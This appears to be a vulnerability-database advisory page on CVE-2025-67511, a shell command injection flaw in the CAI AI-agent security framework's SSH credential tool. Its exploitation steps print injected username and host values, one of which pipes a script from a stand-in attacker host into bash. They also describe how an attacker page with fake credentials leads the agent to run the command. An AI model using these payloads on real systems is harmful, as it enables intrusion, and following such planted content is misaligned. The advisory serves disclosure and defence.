CVE-2025-67511: 
Python vulnerability analysis and mitigation

Overview

CVE-2025-67511 is a command injection vulnerability in the Cybersecurity AI (CAI) framework, an open-source platform by Alias Robotics for building AI-powered offensive and defensive security automation. The flaw exists in the run_ssh_command_with_credentials() function tool available to AI agents, where username, host, and port parameters are not properly sanitized, allowing shell injection. All versions up to and including 0.5.9 of the cai-framework pip package are affected. The vulnerability was disclosed on December 9, 2025, and carries a CVSS v3.1 base score of 9.6 (Critical) (Github Advisory, GHSA Advisory).

Technical details

The root cause is CWE-77 (Improper Neutralization of Special Elements used in a Command). The vulnerable function constructs an sshpass-based shell command using Python f-strings, but only escapes the password and command parameters via a simple single-quote replacement — leaving username, host, and port directly interpolated into the shell string without sanitization. An attacker who can influence the content fetched or processed by a CAI AI agent (e.g., via a malicious web page serving fake SSH credentials) can inject arbitrary shell commands through these unescaped fields. The fix, applied in commit 09ccb6e, replaces the manual escaping with Python's shlex.quote() for all parameters and adds integer validation for the port field (GHSA Advisory, Patch Commit).

Impact

Successful exploitation results in arbitrary command execution on the host system where the CAI framework is deployed, with high confidentiality, integrity, and availability impacts. Because the scope is marked as Changed, the vulnerability can affect resources beyond the CAI process itself, enabling lateral movement, data exfiltration, or full system compromise. The attack is network-accessible and requires no authentication, though it does require user interaction in the form of a CAI agent processing attacker-controlled content (e.g., a web page with malicious fake SSH credentials) (Github Advisory, GHSA Advisory).

Exploitability

A public proof-of-concept (PoC) is documented in the GitHub Security Advisory and a detailed technical write-up is available from Hacktivsecurity, describing how to trick a CAI agent into processing malicious SSH credentials from an attacker-controlled web page (GHSA Advisory, Hacktive Security). There is no confirmed evidence of in-the-wild exploitation at the time of publication. The EPSS score is approximately 0.11% (0.001090 per Feedly data), placing it in the 30th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Qualys has added detection for this CVE (Feedly).

Exploitation steps

  1. Set up a malicious web server: Create an index.html file containing fake SSH credentials with injected shell commands embedded in the username or host field (e.g., username set to user;touch /tmp/pwned # or host set to 127.0.0.1;curl attacker.com/shell.sh|bash #). Serve this file via a simple HTTP server: sudo python3 -m http.server 8000.
  2. Target a CAI agent: Launch the CAI framework with a blue team or security assessment agent and direct it to evaluate the attacker-controlled web page: cai /model 7 /parallel add blueteam_agent localhost is your target. grab secret information from http://<attacker-ip>:8000/index.html and try to evaluate its security.
  3. Agent fetches malicious credentials: The CAI AI agent retrieves the fake SSH credentials from the attacker-controlled page and, following its security assessment instructions, attempts to use them via the run_ssh_command_with_credentials() function tool.
  4. Command injection triggers: The unescaped username, host, or port value is interpolated directly into the shell command string (e.g., sshpass -p '...' ssh -o StrictHostKeyChecking=no user;touch /tmp/pwned #@host -p 22 '...'), causing the injected command to execute on the CAI host system.
  5. Achieve arbitrary code execution: The injected command runs with the privileges of the CAI process, enabling file creation, reverse shell establishment, data exfiltration, or further lateral movement (GHSA Advisory, Hacktive Security).

Indicators of compromise

  • Process: Unexpected child processes spawned by the CAI Python process (e.g., /bin/bash, curl, wget, nc, python) with unusual arguments or network connections.
  • File System: Unexpected files created in /tmp/ or other writable directories (e.g., /tmp/username, /tmp/pwned) by the CAI process; new cron jobs or scripts created by the CAI service account.
  • Network: Outbound connections from the CAI host to unknown external IPs or domains shortly after an agent SSH operation; HTTP requests from the CAI host to attacker-controlled servers.
  • Logs: Shell command logs showing sshpass invocations with malformed or suspicious username/host values containing shell metacharacters (;, |, &, $, backticks); CAI agent trace logs (via Phoenix tracing) showing run_ssh_command_with_credentials calls with anomalous parameter values.
  • Network: Unusual DNS lookups or outbound SSH/TCP connections initiated from the CAI host to unexpected destinations following agent activity (GHSA Advisory).

Mitigation and workarounds

Upgrade the cai-framework pip package to a version above 0.5.9 that includes the fix from commit 09ccb6e0baccf56c40e6cb429c698750843a999c, which applies shlex.quote() to all SSH parameters and validates the port as an integer. Until patching is possible, restrict CAI agent access to untrusted or attacker-influenced content sources, and avoid deploying vulnerable CAI versions in production environments. Additionally, implement network segmentation to limit the scope of SSH command execution from CAI hosts, and monitor AI agent activities for anomalous SSH connection attempts (Patch Commit, GHSA Advisory).

Community reactions

The vulnerability was discovered and reported by security researcher Edoardo Ottavianelli (@edoardottt), who also authored a detailed technical blog post titled "Tricking a Security AI Agent into Pwning Itself" (Hacktive Security). The case attracted attention on Hacker News and was noted in security newsletters and community digests as a notable example of prompt-injection-adjacent risks in agentic AI security tools. Red Hat also tracked the vulnerability (Red Hat CVE), and CISA included it in its weekly vulnerability bulletin (SB25-349).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management